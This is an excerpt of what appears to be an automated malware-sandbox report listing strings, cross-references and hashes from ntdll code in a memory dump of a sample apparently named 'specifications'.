                                                                                                                                                                                  control_flow_graph 112 10c2c0a-10c2c0f 113 10c2c1f-10c2c26 LdrInitializeThunk 112->113 114 10c2c11-10c2c18 112->114
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-2160512332
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Thread identifier, xrefs: 010F553A
                                                                                                                                                                                  • corrupted critical section, xrefs: 010F54C2
                                                                                                                                                                                  • Critical section address., xrefs: 010F5502
                                                                                                                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010F540A, 010F5496, 010F5519
                                                                                                                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 010F5543
                                                                                                                                                                                  • Address of the debug info found in the active list., xrefs: 010F54AE, 010F54FA
                                                                                                                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010F54CE
                                                                                                                                                                                  • Critical section address, xrefs: 010F5425, 010F54BC, 010F5534
                                                                                                                                                                                  • Critical section debug info address, xrefs: 010F541F, 010F552E
                                                                                                                                                                                  • Invalid debug info address of this critical section, xrefs: 010F54B6
                                                                                                                                                                                  • 8, xrefs: 010F52E3
                                                                                                                                                                                  • double initialized or corrupted critical section, xrefs: 010F5508
                                                                                                                                                                                  • undeleted critical section in freed memory, xrefs: 010F542B
                                                                                                                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010F54E2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                  • API String ID: 0-2368682639
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010F22E4
                                                                                                                                                                                  • @, xrefs: 010F259B
                                                                                                                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 010F2602
                                                                                                                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 010F261F
                                                                                                                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 010F2498
                                                                                                                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010F25EB
                                                                                                                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 010F2624
                                                                                                                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010F24C0
                                                                                                                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 010F2506
                                                                                                                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 010F2412
                                                                                                                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 010F2409
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                                  • API String ID: 0-4009184096
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                  • API String ID: 0-2515994595
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                  • API String ID: 0-1700792311
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • HandleTraces, xrefs: 01108C8F
                                                                                                                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 01108B8F
                                                                                                                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01108A67
                                                                                                                                                                                  • VerifierFlags, xrefs: 01108C50
                                                                                                                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01108A3D
                                                                                                                                                                                  • VerifierDebug, xrefs: 01108CA5
                                                                                                                                                                                  • VerifierDlls, xrefs: 01108CBD
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                  • API String ID: 0-3223716464
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                  • API String ID: 0-1109411897
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-792281065
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 010D9A2A
                                                                                                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010D99ED
                                                                                                                                                                                  • LdrpInitShimEngine, xrefs: 010D99F4, 010D9A07, 010D9A30
                                                                                                                                                                                  • apphelp.dll, xrefs: 01076496
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 010D9A11, 010D9A3A
                                                                                                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 010D9A01
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-204845295
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 010F2160, 010F219A, 010F21BA
                                                                                                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 010F219F
                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 010F2165
                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010F21BF
                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 010F2180
                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 010F2178
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                  • API String ID: 0-861424205
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 010F81E5
                                                                                                                                                                                  • LdrpInitializeImportRedirection, xrefs: 010F8177, 010F81EB
                                                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 010F8181, 010F81F5
                                                                                                                                                                                  • LdrpInitializeProcess, xrefs: 010BC6C4
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 010BC6C3
                                                                                                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 010F8170
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                  • API String ID: 0-475462383
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 010C2DF0: LdrInitializeThunk.NTDLL ref: 010C2DFA
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C0BA3
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C0BB6
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C0D60
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010C0D74
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1404860816-0
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                  • API String ID: 0-379654539
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010B855E
                                                                                                                                                                                  • @, xrefs: 010B8591
                                                                                                                                                                                  • LdrpInitializeProcess, xrefs: 010B8422
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 010B8421
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-1918872054
                                                                                                                                                                                  • Opcode ID: cd87ed1e63f2161a55cee5f7ceb1aac5860d9402c03802424635796762a2791e
                                                                                                                                                                                  • Instruction ID: 0e1f4432399fd8543f0e8134e25d0c5234c34b6bae10d295d7fa74ed5bc16e5a
                                                                                                                                                                                  • Opcode Fuzzy Hash: cd87ed1e63f2161a55cee5f7ceb1aac5860d9402c03802424635796762a2791e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 04918871508345AFD761EB25CC81FAFBAECBB88744F40492EFAC496161E734D9448B62
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010F21D9, 010F22B1
                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010F22B6
                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 010F21DE
                                                                                                                                                                                  • .Local, xrefs: 010B28D8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                  • API String ID: 0-1239276146
                                                                                                                                                                                  • Opcode ID: afbc0aa22bcff98bc35f1b199bfb4c42ad3a9204bec6069d9500acc6e5943386
                                                                                                                                                                                  • Instruction ID: ccac4d5ab8554cabd6301f7aff8b44a1e6559c0934b3bd61e6ad89b28b591f00
                                                                                                                                                                                  • Opcode Fuzzy Hash: afbc0aa22bcff98bc35f1b199bfb4c42ad3a9204bec6069d9500acc6e5943386
                                                                                                                                                                                  • Instruction Fuzzy Hash: FDA1BF3590022A9BDB65CF68C8C4BE9B7B0BF58354F1541EAD988AB251D730EE81CF94
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010E10AE
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 010E0FE5
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 010E1028
                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 010E106B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                  • API String ID: 0-1468400865
                                                                                                                                                                                  • Opcode ID: 0a30b51ede5ce997c5273b198b4ce555e19b12a077b75117d8dbf581dc91b263
                                                                                                                                                                                  • Instruction ID: c379ca71bd00ea4648c99ff449b635a176e1b912d1bc208ae837d59533b6eb90
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a30b51ede5ce997c5273b198b4ce555e19b12a077b75117d8dbf581dc91b263
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5971BFB19083059FCB61EF14C885B9B7FE8AF54764F400469F9C88B286D775D588CBE2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • LdrpDynamicShimModule, xrefs: 010EA998
                                                                                                                                                                                  • apphelp.dll, xrefs: 010A2462
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 010EA9A2
                                                                                                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 010EA992
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-176724104
                                                                                                                                                                                  • Opcode ID: 12af27a649529653b3a8eb47df40827dde2e2e14e52651114aaa274e6a13c36f
                                                                                                                                                                                  • Instruction ID: 5d5e77afc3d5dcc0cd6da5f23007c19374eb795a701f4ee1f1ccfc45b20f4c7f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 12af27a649529653b3a8eb47df40827dde2e2e14e52651114aaa274e6a13c36f
                                                                                                                                                                                  • Instruction Fuzzy Hash: EB312A75B10301EFDB399F9AD845AAEB7F5FB88714F160069E9A1AB345C7705881CB80
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 01093255
                                                                                                                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0109327D
                                                                                                                                                                                  • HEAP: , xrefs: 01093264
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                                  • API String ID: 0-617086771
                                                                                                                                                                                  • Opcode ID: 94a6deed2b53922d4d349e97ec59ef140a1ce04f48915e7019f5239cab946f64
                                                                                                                                                                                  • Instruction ID: c3558662539bfd90d900e333a9deb6e868b3e177416a8371f007535a99096475
                                                                                                                                                                                  • Opcode Fuzzy Hash: 94a6deed2b53922d4d349e97ec59ef140a1ce04f48915e7019f5239cab946f64
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9992BC71A042499FDF65CFA8C4607AEBBF1FF48304F1880A9E899AB391D735A941DF50
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                  • API String ID: 0-4253913091
                                                                                                                                                                                  • Opcode ID: a301d8f8e93120640a1054b73cd440ca531f19871d9933f51e65f2768de7bc1d
                                                                                                                                                                                  • Instruction ID: 86943306984ce0330008b309e997c1bc06ae20c1553adac62872a34aa71da9de
                                                                                                                                                                                  • Opcode Fuzzy Hash: a301d8f8e93120640a1054b73cd440ca531f19871d9933f51e65f2768de7bc1d
                                                                                                                                                                                  • Instruction Fuzzy Hash: B4F1CC34B00606DFEB15CF69C8A4B6EB7F9FB45308F1485A8E4969B385D734E981CB90
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $@
                                                                                                                                                                                  • API String ID: 0-1077428164
                                                                                                                                                                                  • Opcode ID: 3eaab2b434405b4f281c32c21a0b7b7914348906aa722836b19860806db2d87b
                                                                                                                                                                                  • Instruction ID: 093db1db17a2489455e67e58c94e5db114d1dbc07e77cfdbc7e1060e09124c9e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3eaab2b434405b4f281c32c21a0b7b7914348906aa722836b19860806db2d87b
                                                                                                                                                                                  • Instruction Fuzzy Hash: EBC2AC716083419FEB65CF69C880BABBBE5BF88704F44896DE9C987241D736D805CB92
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                  • API String ID: 0-2779062949
                                                                                                                                                                                  • Opcode ID: fc86af84c85e8586beb8cc9a18335f7a7da49d1a4ef9bd1248b79559d2953a92
                                                                                                                                                                                  • Instruction ID: 6a833ef558fd94124f904367213ef3d920eceafcb7bf87f6e61da8895abe3392
                                                                                                                                                                                  • Opcode Fuzzy Hash: fc86af84c85e8586beb8cc9a18335f7a7da49d1a4ef9bd1248b79559d2953a92
                                                                                                                                                                                  • Instruction Fuzzy Hash: A4A179719012299BEB319F68CD88BEEB7B8FF44710F0041EAE949A7250DB359E85CF54
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 010EA121
                                                                                                                                                                                  • LdrpCheckModule, xrefs: 010EA117
                                                                                                                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 010EA10F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-161242083
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                  • API String ID: 0-1334570610
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 010F82D7
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 010F82E8
                                                                                                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 010F82DE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-1783798831
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • PreferredUILanguages, xrefs: 0113C212
                                                                                                                                                                                  • @, xrefs: 0113C1F1
                                                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0113C1C5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                  • API String ID: 0-2968386058
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                  • API String ID: 0-1373925480
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01104899
                                                                                                                                                                                  • LdrpCheckRedirection, xrefs: 0110488F
                                                                                                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01104888
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                  • API String ID: 0-3154609507
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                  • API String ID: 0-2558761708
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • LdrpInitializationFailure, xrefs: 011020FA
                                                                                                                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 011020F3
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01102104
                                                                                                                                                                                  Memory Dump Source
